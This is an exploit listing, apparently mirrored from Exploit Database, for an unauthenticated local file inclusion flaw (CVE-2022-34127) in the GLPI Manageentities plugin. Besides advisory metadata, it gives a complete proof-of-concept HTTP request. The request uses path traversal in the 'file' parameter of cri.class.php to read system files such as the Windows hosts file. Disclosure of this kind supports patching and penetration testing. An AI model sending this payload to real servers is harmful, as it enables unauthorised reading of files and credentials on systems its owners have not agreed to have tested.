GLPI 4.0.2 – Unauthenticated Local File Inclusion on Manageentities plugin

• Exploit Database
• 99 阅读

• 作者： Nuri Çilengir
  日期： 2023-04-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51229/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

  # ADVISORY INFORMATION # Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin # Date of found: 11 Jun 2022 # Application: GLPI Manageentities < 4.0.2 # Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/ # Software Link: https://github.com/InfotelGLPI/manageentities # Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/ # Tested on: Ubuntu 22.04 # CVE : CVE-2022-34127   # PoC GET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1 Host: 192.168.56.113 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1